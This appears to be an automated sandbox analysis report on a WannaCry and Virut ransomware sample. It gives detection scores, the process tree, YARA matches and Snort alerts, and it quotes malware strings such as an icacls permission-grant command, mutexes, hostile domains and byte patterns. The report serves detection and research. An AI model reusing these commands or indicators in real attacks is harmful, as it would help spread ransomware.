
Windows Analysis Report
HFKDS6VcNO

Overview

General Information

Sample Name: HFKDS6VcNO (renamed file extension from none to dll)
Analysis ID: 670273
MD5: a653c0208aa9acb903bdb441897f8874
SHA1: 817cbd6c8cae90d80555e1935c41adb8bcb0ba7a
SHA256: 757f15a84e4a94e139d44d03450241f161442785d216a6220c7332edcda79539
Tags: dllOpenCTIBRSandboxed

Detection

Wannacry, Virut
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Yara detected Virut
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
PE file has a writeable .text section
Changes memory attributes in foreign processes to executable or writable
Tries to evade debugger and weak emulator (self modifying code)
Machine Learning detection for sample
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4728 cmdline: loaddll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5032 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5772 cmdline: rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 5092 cmdline: C:\WINDOWS\mssecsvc.exe MD5: C69A376D234A2990509A077940306C82)
          • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
          • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
          • fontdrvhost.exe (PID: 692 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • fontdrvhost.exe (PID: 700 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • svchost.exe (PID: 716 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 796 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 840 cmdline: c:\windows\system32\svchost.exe -k rpcss -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 888 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 276 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 8 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 312 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 532 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1108 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1144 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1220 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1272 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1340 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1356 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1480 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1528 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1536 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s FontCache MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1728 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1736 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s nsi MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1772 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1780 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • rundll32.exe (PID: 3200 cmdline: rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1604 cmdline: rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 1504 cmdline: C:\WINDOWS\mssecsvc.exe MD5: C69A376D234A2990509A077940306C82)
        • tasksche.exe (PID: 5936 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 3233ACED9279EF54267C479BBA665B90)
  • mssecsvc.exe (PID: 3296 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: C69A376D234A2990509A077940306C82)
    • dwm.exe (PID: 952 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
  • svchost.exe (PID: 5664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author
HFKDS6VcNO.dll | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
HFKDS6VcNO.dll | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
HFKDS6VcNO.dll | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source | Rule | Description | Author
C:\Windows\mssecsvc.exe | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
    • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0x3136c:$x3: tasksche.exe
    • 0x4157c:$x3: tasksche.exe
    • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0x415d0:$x5: WNcry@2ol7
    • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
    • 0xe048:$x7: mssecsvc.exe
    • 0x17350:$x7: mssecsvc.exe
    • 0x31344:$x8: C:\%s\qeriuwjhrf
    • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xe034:$s1: C:\%s\%s
    • 0x17338:$s1: C:\%s\%s
    • 0x31358:$s1: C:\%s\%s
    • 0x414d0:$s3: cmd.exe /c "%s"
    • 0x73a24:$s4: msg/m_portuguese.wnry
    • 0x2e68c:$s5: \\192.168.56.20\IPC$
    • 0x1ba81:$s6: \\172.16.99.5\IPC$
    • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
    • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
    • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
    • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
C:\Windows\mssecsvc.exe | WannaCry_Ransomware_Gen | Detects WannaCry Ransomware | Florian Roth (based on rule by US CERT)
    • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
    • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
    • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
    • 0x1d439:$s1: __TREEID__PLACEHOLDER__
    • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
    • 0x1f508:$s1: __TREEID__PLACEHOLDER__
    • 0x20570:$s1: __TREEID__PLACEHOLDER__
    • 0x215d8:$s1: __TREEID__PLACEHOLDER__
    • 0x22640:$s1: __TREEID__PLACEHOLDER__
    • 0x236a8:$s1: __TREEID__PLACEHOLDER__
    • 0x24710:$s1: __TREEID__PLACEHOLDER__
    • 0x25778:$s1: __TREEID__PLACEHOLDER__
    • 0x267e0:$s1: __TREEID__PLACEHOLDER__
    • 0x27848:$s1: __TREEID__PLACEHOLDER__
    • 0x288b0:$s1: __TREEID__PLACEHOLDER__
    • 0x29918:$s1: __TREEID__PLACEHOLDER__
    • 0x2a980:$s1: __TREEID__PLACEHOLDER__
    • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
    • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e340:$s1: __TREEID__PLACEHOLDER__
C:\Windows\mssecsvc.exe | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
C:\Windows\mssecsvc.exe | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
      • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
      • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
C:\Windows\mssecsvc.exe | Win32_Ransomware_WannaCry | unknown | ReversingLabs
      • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
      • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
      • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
      • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
(3 entries in the full report)
Source | Rule | Description | Author
0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
(143 entries in the full report)
Source | Rule | Description | Author
4.0.mssecsvc.exe.7100a4.5.unpack | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
                • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
                • 0xf4d8:$x3: tasksche.exe
                • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
                • 0xf52c:$x5: WNcry@2ol7
                • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
                • 0xf42c:$s3: cmd.exe /c "%s"
                • 0x41980:$s4: msg/m_portuguese.wnry
                • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
                • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
                • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
4.0.mssecsvc.exe.7100a4.5.unpack | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
                • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
                • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
4.0.mssecsvc.exe.7100a4.5.unpack | Win32_Ransomware_WannaCry | unknown | ReversingLabs
                • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
                • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
6.0.mssecsvc.exe.7100a4.5.unpack | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
                • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
                • 0xf4d8:$x3: tasksche.exe
                • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
                • 0xf52c:$x5: WNcry@2ol7
                • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
                • 0xf42c:$s3: cmd.exe /c "%s"
                • 0x41980:$s4: msg/m_portuguese.wnry
                • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
                • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
                • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.0.mssecsvc.exe.7100a4.5.unpack | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
                • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
                • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
(135 entries in the full report)
                No Sigma rule has matched
Timestamp: 07/20/22-19:38:14.180756
Source IP: 192.168.2.7
Destination IP: 104.16.173.80
SID: 2024298
Source Port: 49722
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:40:39.364164
Source IP: 192.168.2.7
Destination IP: 8.8.8.8
SID: 2024281
Source Port: 58715
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:42:02.043613
Source IP: 192.168.2.7
Destination IP: 8.8.8.8
SID: 2012730
Source Port: 58838
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:42:33.215516
Source IP: 192.168.2.7
Destination IP: 8.8.8.8
SID: 2024281
Source Port: 52925
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:41:32.051223
Source IP: 8.8.8.8
Destination IP: 192.168.2.7
SID: 2811577
Source Port: 53
Destination Port: 49495
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:40:36.366445
Source IP: 192.168.2.7
Destination IP: 104.16.173.80
SID: 2024298
Source Port: 49729
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:40:36.279977
Source IP: 192.168.2.7
Destination IP: 8.8.8.8
SID: 2024291
Source Port: 60996
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:41:09.165765
Source IP: 8.8.8.8
Destination IP: 192.168.2.7
SID: 2811577
Source Port: 53
Destination Port: 64618
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:38:14.102838
Source IP: 192.168.2.7
Destination IP: 8.8.8.8
SID: 2024291
Source Port: 57859
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:40:08.155803
Source IP: 192.168.2.7
Destination IP: 8.8.8.8
SID: 2012730
Source Port: 63557
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-19:38:14.222408
Source IP: 104.16.173.80
Destination IP: 192.168.2.7
SID: 2031515
Source Port: 80
Destination Port: 49722
Protocol: TCP
Classtype: Misc activity

Timestamp: 07/20/22-19:40:36.404548
Source IP: 104.16.173.80
Destination IP: 192.168.2.7
SID: 2031515
Source Port: 80
Destination Port: 49729
Protocol: TCP
Classtype: Misc activity

                AV Detection

Source: HFKDS6VcNO.dll | Virustotal: Detection: 86%
Source: HFKDS6VcNO.dll | ReversingLabs: Detection: 89%
Source: HFKDS6VcNO.dll | Avira: detected
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | URL Reputation: Label: malware
Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Virustotal: Detection: 12%
Source: C:\Windows\mssecsvc.exe | Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Windows\tasksche.exe | Avira: detection malicious, Label: TR/FileCoder.AU
Source: C:\Windows\mssecsvc.exe | Virustotal: Detection: 89%
Source: C:\Windows\mssecsvc.exe | Metadefender: Detection: 82%
Source: C:\Windows\mssecsvc.exe | ReversingLabs: Detection: 97%
Source: C:\Windows\tasksche.exe | Virustotal: Detection: 89%
Source: C:\Windows\tasksche.exe | Metadefender: Detection: 85%
Source: C:\Windows\tasksche.exe | ReversingLabs: Detection: 95%
Source: HFKDS6VcNO.dll | Joe Sandbox ML: detected
Source: C:\Windows\mssecsvc.exe | Joe Sandbox ML: detected
Source: C:\Windows\tasksche.exe | Joe Sandbox ML: detected
Source: 4.0.mssecsvc.exe.400000.6.unpack | Avira: Label: W32/Virut.Gen
Source: 4.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 9.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.7100a4.5.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 9.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.2.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.2.mssecsvc.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.400000.2.unpack | Avira: Label: W32/Virut.Gen
Source: 19.0.tasksche.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.400000.4.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.7100a4.5.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.7100a4.7.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.400000.2.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.7100a4.7.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 9.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.0.mssecsvc.exe.7100a4.3.unpack | Avira: Label: TR/FileCoder.AU
Source: 19.2.tasksche.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 9.2.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.3.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.400000.4.unpack | Avira: Label: W32/Virut.Gen
Source: 6.0.mssecsvc.exe.400000.6.unpack | Avira: Label: W32/Virut.Gen
Source: C:\Windows\tasksche.exe | Code function: 19_2_004018B9 CryptReleaseContext, 19_2_004018B9
Source: HFKDS6VcNO.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

                Networking

Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Wed, 20 Jul 2022 17:38:14 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72dd7826abe95c14-FRA
Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Wed, 20 Jul 2022 17:40:36 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72dd7b9f5ba1691b-FRA
Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: Traffic | Snort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.7:57859 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49722 -> 104.16.173.80:80
Source: Traffic | Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49722
Source: Traffic | Snort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.7:63557 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.7:60996 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49729 -> 104.16.173.80:80
Source: Traffic | Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49729
Source: Traffic | Snort IDS: 2024281 ET TROJAN Known Hostile Domain ant.trenz .pl Lookup 192.168.2.7:58715 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.7:64618
Source: Traffic | Snort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.7:49495
Source: Traffic | Snort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.7:58838 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2024281 ET TROJAN Known Hostile Domain ant.trenz .pl Lookup 192.168.2.7:52925 -> 8.8.8.8:53
Source: unknown | DNS traffic detected: query: bnkmik.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: vpqnxj.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: ocxepi.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: wyksye.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: iyvsrd.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: oonymf.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: lyyppo.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: rdtvdr.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: ogggyz.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: yzeofb.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: nbjvkj.com replaycode: Name error (3)
